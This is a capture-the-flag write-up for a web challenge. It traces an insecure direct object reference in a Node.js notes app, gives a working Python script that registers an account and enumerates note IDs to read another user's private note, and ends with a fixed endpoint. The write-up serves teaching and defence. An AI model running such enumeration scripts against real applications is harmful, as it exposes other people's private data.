The Gate of Broken Names - CTF Writeup

Challenge: The Gate of Broken Names Category: Web Difficulty: Easy/Medium

Challenge Description

Among the ruins of Briarfold, Mira uncovers a gate of tangled brambles and forgotten sigils. Every name carved into its stone has been reversed, letters twisted, meanings erased. When she steps through, the ground blurs�the village ahead is hers, yet wrong: signs rewritten, faces familiar but altered, her own past twisted. Tracing the pattern through spectral threads of lies and illusion, she forces the true gate open�not by key, but by unraveling the false paths the Hollow King left behind.

Initial Reconnaissance

The challenge presents a web application running on 167.172.XX.XX.XX:XXXXX with a notes/journaling system. Users can register accounts, login, and manage personal notes.

Application Structure

The application appears to be a Node.js/Express application with the following key features:

User registration and authentication
Note creation and management
Public and private note visibility
Session-based authentication

Source Code Analysis

After examining the application source code, several key files reveal the vulnerability:

Authentication System (`/server/routes/auth.js`)

The authentication system allows user registration and login with basic validation:

router.post('/register', async (req, res) => {
  const { username, password, email, confirm_password } = req.body;
  // Basic validation and user creation
  const newUser = db.users.create({
    username,
    password,
    role: 'visitor',
    email
  });
});

Notes System (`/server/routes/notes.js`)

The critical vulnerability lies in the notes endpoint:

router.get('/:id', async (req, res) => {
  if (!req.session.user_id) {
    return res.status(401).json({ error: 'Unauthorized' });
  }

  const noteId = parseInt(req.params.id);
  
  try {
    const note = db.notes.findById(noteId);
    
    if (note) {
      const user = getUserById(note.user_id);
      res.json({
        ...note,
        username: user ? user.username : 'Unknown'
      });
    } else {
      res.status(404).json({ error: 'Note not found' });
    }
  } catch (error) {
    console.error('Error fetching note:', error);
    res.status(500).json({ error: 'Failed to fetch note' });
  }
});

Vulnerability Identified: The endpoint checks if a user is authenticated but does not verify ownership of the requested note. This creates an Insecure Direct Object Reference (IDOR) vulnerability.

Data Initialization (`/server/init-data.js`)

The initialization script reveals how the flag is stored:

export function generateRandomNotes(totalNotes = 200) {
  const flag = readFlag();
  const flagPosition = Math.floor(Math.random() * totalNotes) + 1;
  
  // Flag is stored in a private note at random position
  if (i === flagPosition) {
    notes.push({
      id: 10 + i,
      user_id: 1,
      title: 'Critical System Configuration',
      content: flag,
      is_private: 1,  // Private note!
      // ...
    });
  }
}

Key findings:

The flag is stored in a private note (is_private: 1)
The note is placed at a random position among ~200 generated notes
Note IDs start from 11 (after 10 system notes)
The flag note belongs to user ID 1 (admin)

Exploitation

Vulnerability: Insecure Direct Object Reference (IDOR)

The /api/notes/:id endpoint allows any authenticated user to access any note by ID, regardless of:

Note privacy settings (is_private)
Note ownership (user_id)

Exploitation Strategy

Register a new user account
Authenticate with the application
Enumerate note IDs to find the flag
Extract the flag from the private note

Exploit Implementation

#!/usr/bin/env python3
# Script by -------
import requests
import secrets
import string

BASE_URL = "http://<YOUR-IP>"

def rand_text(length=10):
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

def register(session, username, password, email):
    session.post(
        f"{BASE_URL}/api/auth/register",
        data={
            "username": username,
            "password": password,
            "confirm_password": password,
            "email": email,
        },
        allow_redirects=False,
    )

def login(session, username, password):
    session.post(
        f"{BASE_URL}/api/auth/login",
        data={"username": username, "password": password},
        allow_redirects=False,
    )

def fetch_flag(session, max_id=250):
    print(f"[*] Searching through {max_id} notes for flag...")
    for note_id in range(1, max_id + 1):
        try:
            r = session.get(f"{BASE_URL}/api/notes/{note_id}")
            if note_id % 50 == 0:  # Progress indicator
                print(f"[*] Checked {note_id}/{max_id} notes...")
            
            if r.status_code == 200:
                try:
                    data = r.json()
                    if "HTB{" in data.get("content", ""):
                        print(f"[+] Flag found in note {note_id}!")
                        return note_id, data["content"]
                except:
                    # Handle non-JSON responses
                    if "HTB{" in r.text:
                        print(f"[+] Flag found in note {note_id}!")
                        return note_id, r.text
        except Exception as e:
            continue
    return None, None

def main():
    print("[*] Starting Gate of Broken Names exploit...")
    session = requests.Session()
    username = f"user_{rand_text()}"
    password = rand_text(12)
    email = f"{username}@example.com"

    print(f"[*] Registering user: {username}")
    register(session, username, password, email)
    
    print(f"[*] Logging in as: {username}")
    login(session, username, password)
    
    # Verify authentication
    check = session.get(f"{BASE_URL}/api/auth/session")
    if check.status_code == 200 and "authenticated" in check.text:
        print("[+] Successfully authenticated!")
    else:
        print("[-] Authentication failed!")
        return
    
    note_id, flag = fetch_flag(session)

    if flag:
        print(f"\n?? SUCCESS! ??")
        print(f"[+] Flag found in note {note_id}: {flag}")
    else:
        print("\n[-] Flag not found within scanned range.")

if __name__ == "__main__":
    main()

Mitigation

To fix this vulnerability, implement proper authorization checks:

router.get('/:id', async (req, res) => {
  if (!req.session.user_id) {
    return res.status(401).json({ error: 'Unauthorized' });
  }

  const noteId = parseInt(req.params.id);
  const note = db.notes.findById(noteId);
  
  if (!note) {
    return res.status(404).json({ error: 'Note not found' });
  }
  
  // Authorization check: users can only access their own notes
  // OR public notes (is_private = 0)
  if (note.user_id !== req.session.user_id && note.is_private === 1) {
    return res.status(403).json({ error: 'Access denied' });
  }
  
  // Return note data...
});

Key Takeaways

Authentication ? Authorization: Just because a user is logged in doesn't mean they should access all resources
IDOR vulnerabilities are common in applications that use predictable resource identifiers
Always implement ownership checks before returning sensitive data
Private/sensitive data should never be accessible through direct object references without proper authorization

PreviousEndpoint Detection and Response NextModern Red Team Infrastructure: Using Aged Domains to Bypass Reputation Controls

Last updated 1 month ago

Good afternoon

hashtagChallenge Description

hashtagInitial Reconnaissance

hashtagApplication Structure

hashtagSource Code Analysis

hashtagAuthentication System (/server/routes/auth.js)

hashtagNotes System (/server/routes/notes.js)

hashtagData Initialization (/server/init-data.js)

hashtagExploitation

hashtagVulnerability: Insecure Direct Object Reference (IDOR)

hashtagExploitation Strategy

hashtagExploit Implementation

hashtagMitigation

hashtagKey Takeaways